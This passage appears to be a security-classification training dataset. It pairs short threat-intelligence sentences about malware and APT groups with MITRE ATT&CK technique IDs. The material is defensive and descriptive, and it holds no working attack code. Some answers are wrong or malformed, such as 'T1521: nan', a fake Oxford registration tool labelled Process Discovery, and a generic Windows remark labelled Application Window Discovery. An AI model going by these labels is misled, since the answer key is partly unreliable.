Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The malware drops the Windows batch file dx.bat, which attempts to kill the task daumcleaner.exe; a Korean security program### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has cleared event logs on compromised hosts.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DDKONG downloads and uploads files on the victim’s machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoisonIvy hides any strings related to its own indicators of compromise.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bundlore uses the pkill cfprefsd command to prevent users from inspecting processes.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HALFBAKED can obtain information about running processes on the victim.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Goopy's decrypter have been inflated with junk code in between legitimate API functions, and also included infinite loops to avoid analysis.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The JHUHUGIT dropper can delete itself from the victim.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JCry has used PowerShell to execute payloads.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may search and gather information about victims from closed sources that can be used during targeting.### Assistant: T1597: Search Closed Sources" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MegaCortex can parse the available drives and directories to determine which files to encrypt.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Proc memory injection is commonly performed by overwriting the target processes’ stack using memory mappings provided by the /proc filesystem.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DEATHRANSOM can enumerate logical drives on a target system.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,captures window titles.### Assistant: T1010: Application Window Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,All forms of phishing are electronically delivered social engineering.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay can take screenshots every 30 seconds as well as when an external removable storage device is connected.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GrimAgent has the ability to enumerate files and directories on a compromised host.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may install malicious ISAPI extensions and filters to observe and/or modify traffic, execute commands on compromised machines, or proxy command and control traffic.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,As we discover new tools used by this group, we have consistently discovered overlapping artifacts with previously used tools and infrastructure### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT37 has used strategic web compromises, particularly of South Korean websites, to distribute malware.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MechaFlounder uses a python-based payload.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 has identified security software, configurations, defensive tools, and sensors installed on a compromised system.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,* .plist.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper also decrypted image files which contained a payload.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Babuk can use “WNetOpenEnumW” and “WNetEnumResourceW” to enumerate files in network resources for encryption.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 12 and Figure 13 show the RSA keys used in FELIXROOT, and Figure 14 shows the AES encryption parameters### Assistant: T1521: nan" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Final1stspy uses Python code to deobfuscate base64-encoded strings.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WannaCry uses Tor for command and control traffic.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADCALL uses a FakeTLS method during C2.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ecipekac can download additional payloads to a compromised host.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some of the key obfuscation techniques used are: Character Replacement: Several instances of character replacement and string reversing techniques (Figure 10) make analysis difficult### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Unlike in Cloud Service Discovery, this technique focuses on the discovery of components of the provided services rather than the services themselves.### Assistant: T1580: Cloud Infrastructure Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has modified LNK shortcuts.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse time providers to execute DLLs when the system boots.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 has also obtained OWA account credentials during intrusions that it subsequently used to attempt to regain access when evicted from a victim network.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One persistence mechanism used by CozyCar is to register itself as a scheduled task.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole has used a custom implementation of DNS tunneling to embed C2 communications in DNS requests and replies.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It also uses a one-byte xor against 0x91 to encode configuration data.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT has used LZMA and base64 libraries to decode obfuscated scripts.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8 has used environment variables and standard input to obfuscate command-line arguments.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,System firmware like BIOS and EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The security command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SHIPSHAPE achieves persistence by creating a shortcut in the Startup folder.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pteranodon can capture screenshots at a configurable interval.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Several operating system administration utilities exist that can be used to gather this information.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If one is identified, it will encrypt the files on the attached device.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gazer identifies a proxy server if it exists and uses it to make HTTP requests.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may modify the kernel to automatically execute programs on system boot.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Comnie uses RC4 and Base64 to obfuscate strings.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 gained initial network access to some victims via a trojanized update of SolarWinds Orion software.### Assistant: T1195: Supply Chain Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ObliqueRAT can gain persistence by a creating a shortcut in the infected user's Startup directory.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KONNI can gather the OS version, architecture information, connected drives, hostname, and computer name from the victim’s machine and has used systeminfo.exe to get a snapshot of the current system state of the target machine.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They may do this, for example, by retrieving account usernames or by using OS Credential Dumping.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windows SSP DLLs are loaded into the Local Security Authority process at system start.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Transparent Tribe has used websites with malicious hyperlinks and iframes to infect targeted victims with Crimson, njRAT, and other malicious tools.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lokibot has tricked recipients into enabling malicious macros by getting victims to click ""enable content"" in email attachments.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The C&C server then replies with the encrypted serialized configuration### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has exfiltrated stolen victim data through C2 communications.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HTTP/S packets have many fields and headers in which data can be concealed.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SombRAT can enumerate services on a victim machine.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files.### Assistant: T1104: Multi-Stage Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JHUHUGIT has a command to download files to the victim’s machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MarkiRAT can utilize cmd.exe to execute commands in a victim's environment.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 has performed screen captures of victims, including by using a tool, scr.exe .### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ke3chang regained access after eviction via the corporate VPN solution with a stolen VPN certificate, which they had extracted from a compromised host.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This campaign began with a handful of spear phishing emails to South Korean targets and containing malicious attachments### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Trojan checks to see if the result of this query returned a class with more than 0 elements, which would most likely be true in a non-virtual environment### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 also created a scheduled task to maintain SUNSPOT persistence when the host booted.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShimRat can download additional files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,New services created by RawPOS are made to appear like legitimate Windows services, with names such as ""Windows Management Help Service"", ""Microsoft Support"", and ""Windows Advanced Task Manager"".### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has moved and renamed pubprn.vbs to a .txt file to avoid detection.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8 has used valid accounts for persistence and lateral movement.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has used a custom collection method to intercept two-factor authentication soft tokens.### Assistant: T1111: Two-Factor Authentication Interception" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Anchor can use secondary C2 servers for communication after establishing connectivity and relaying victim information to primary C2 servers.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Access to login hook scripts may allow an adversary to insert additional malicious code.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LightNeuron uses SMTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pasam creates a backdoor through which remote attackers can retrieve information such as hostname and free disk space.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has inserted garbage characters into code, presumably to avoid anti-virus detection.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 3 – A list of file extensions targeted for destruction by new variant of KillDisk component As well as being able to delete system files to make the system unbootable – functionality typical for such destructive trojans – the KillDisk variant detected in the electricity distribution companies also appears to contain some additional functionality specifically intended to sabotage industrial systems### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,19-1 regsvr32 running the .dlls Fig### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When the device is inserted into another system, it opens autorun.inf and loads the malware.### Assistant: T1091: Replication Through Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has obtained files from the victim's cloud storage instances.### Assistant: T1530: Data from Cloud Storage Object" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT37 has used Windows DDE for execution of commands and a malicious VBS.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some variants of ADVSTORESHELL achieve persistence by registering the payload as a Shell Icon Overlay handler COM object.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Siloscape connects to an IRC server for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CallMe uses AES to encrypt C2 traffic.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures .### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems.### Assistant: T1539: Steal Web Session Cookie" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Andariel has collected large numbers of files from compromised network systems for later extraction.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FELIXROOT uses HTTP and HTTPS to communicate with the C2 server.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silence can capture victim screen activity.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of PowerShell/Rundll32 to be explorer.exe rather than an Office document delivered as part of Spearphishing Attachment.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To make profile pages appear more legitimate, APT17 has created biographical sections and posted in forum threads.### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole has disguised its droppers as legitimate software or documents, matching their original names and locations, and saved its files as mpr.dll in the Windows folder.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary with the backdoored one.### Assistant: T1554: Compromise Client Software Binary" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla can collect the system's computer name and also has the capability to collect information on the processor, memory, OS, and video card from the system.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may search digital certificate data to gather actionable information.### Assistant: T1596: Search Open Technical Databases" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crutch has exfiltrated stolen data to Dropbox.### Assistant: T1567: Exfiltration Over Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro can hook APIs, kill processes, break file system paths, and change ACLs to prevent security tools from running.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,On Linux or macOS, when the setuid or setgid bits are set for an application, the application will run with the privileges of the owning user or group respectively. .### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PlugX uses Pastebin to store C2 addresses.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has sent spearphishing email links attempting to get a user to click.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT has used a Python tool named Bewmac to record the webcam on compromised hosts.### Assistant: T1125: Video Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSTATS can use WMI queries to retrieve data from compromised hosts.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Threat Group-3390 tool can create a new service, naming it after the config information, to gain persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Spark has used a custom XOR algorithm to decrypt the payload.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This IP is of particular interest as historical domain resolutions of this IP revealed that it had resolved to the domain hotmai1l[.]com in the past as well, which was a domain we had previously identified as having a high likelihood of association with DarkHydrus infrastructure### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SPACESHIP identifies files and directories for collection by searching for specific file extensions or file modification time.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TajMahal has the ability to capture VoiceIP application audio on an infected host.### Assistant: T1123: Audio Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla RPC backdoors can be used to transfer files to/from victim machines on the local network.### Assistant: T1570: Lateral Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BadPatch uses HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Skidmap has the ability to install several loadable kernel modules on infected machines.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Permissions to interact with local and remote server COM objects are specified by access control lists in the Registry.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RogueRobin collects the victim’s username and whether that user is an admin.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol.### Assistant: T1040: Network Sniffing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZIRCONIUM has used a tool to capture the time on a compromised host in order to register it with C2.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleSeed can identify the OS version of a targeted system.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally, system configuration changes may cause folders such as usr/local/bin to become globally writeable.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Shamoon attempts to copy itself to remote machines on the network.### Assistant: T1570: Lateral Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Common client software types are SSH clients, FTP clients, email clients, and web browsers.### Assistant: T1554: Compromise Client Software Binary" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,http://www.cankayasrc[.]com/style/js/main.php http://ektamservis[.]com/includes/main.php http://gtme[.]ae/font-awesome/css/main.php Recommendations for organizations Effective protection from targeted attacks focuses on advanced detective, preventive and investigative capabilities via solutions and training, allowing an organization to control any activities on their network or suspicious files on user systems### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It is possible to delegate GPO access control permissions, e.g.### Assistant: T1484: Domain Policy Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used malware to collect the victim’s IP address and domain name.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 used cmd.exe /c to execute commands on remote machines.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HOPLIGHT has used its C2 channel to exfiltrate data.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Botnets are commonly used to conduct DDoS attacks against networks and services.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OwaAuth DES-encrypts captured credentials using the key 12345678 before writing the credentials to a log file.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In one example, the Word document contained a button with the label “First click “Enable Content” above the page, then click here to fill out the form” This string attempts to trick the user into enabling macros to execute the malicious code within the macro### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM can detect if it is running within a sandbox or other virtualized analysis environment.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has used stolen credentials to compromise Outlook Web Access .### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbanak’s Harpy backdoor malware can use DNS as a backup channel for C2 if HTTP fails.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may do this to execute commands as other users or spawn processes with higher privileges.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Exfiltrate data using HTTP over HTTP over AES over XOR, or any combination of the available transports### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remexi uses AutoIt and VBS scripts throughout its execution process.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used gzip for Linux OS and a modified RAR software to archive data on Windows hosts.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide Adversary-in-the-Middle capability for intercepting information transmitted over secure TLS/SSL communications.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These credentials can be stored and/or misplaced in many locations on a system, including plaintext files , operating system or application-specific repositories , or other specialized files/artifacts .### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Access to these APIs are often over HTTPS, which gives the adversary an additional level of protection.### Assistant: T1567: Exfiltration Over Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,njRAT has used a fast flux DNS for C2 IP resolution.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Windows utility Nltest is known to be used by adversaries to enumerate domain trusts.### Assistant: T1482: Domain Trust Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse launchctl to execute commands or programs.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,at can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has leveraged numerous pieces of malware that appear to be unique to APT29 and were likely developed for or by the group.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla RPC backdoors have also retrieved registered RPC interface information from process memory.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The majority of businesses still maintain Windows-heavy user environments where certain core infrastructure components also operate under Windows servers (e.g., Active Directory, SharePoint, etc.)### Assistant: T1010: Application Window Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,USBStealer monitors victims for insertion of removable drives.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may leverage Microsoft Office-based applications for persistence between startups.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Siloscape searches for the Kubernetes config file and other related files using a regular expression.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork hides base64-encoded and encrypted C2 server locations in comments on legitimate websites.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KGH_SPY has the ability to steal data from the Chrome, Edge, Firefox, Thunderbird, and Opera browsers.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BACKSPACE uses HTTP as a transport to communicate with its command server.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has used PowerShell for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 used GetPassword_x64 to harvest credentials.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX_OCEANLOTUS.D has changed permissions of a second-stage payload to an executable via chmod.### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A version of Daserf uses the MPRESS packer.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,admin@338 actors used the following commands after exploiting a machine with LOWBALL malware to obtain information about the OS: ver >> %temp%\download systeminfo >> %temp%\download OilRig has run hostname and systeminfo on a victim.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Visitors are asked to download the “University Of Oxford Job Symposium Pre-Register Tool”: The downloaded file (which is also signed with an AI Squared certificate), is a fake registration tool built by the attackers: OxfordSymposiumRegTool.exe f77ee804de304f7c3ea6b87824684b33 If run by the victim, their computer would get infected, while they are shown this registration process: Note that after completing the “registration process”, the victim is asked to send the form to an email address in oxford-careers[.]com, which also belongs to the attackers### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Webshell has the ability to list files and file characteristics including extension, size, ownership, and permissions.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may create fake social media accounts and message employees for potential job opportunities.### Assistant: T1598: Phishing for Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 was able to get SUNBURST signed by SolarWinds code signing certificates by injecting the malware into the SolarWinds Orion software lifecycle.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Conti has decrypted its payload using a hardcoded AES-256 key.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE 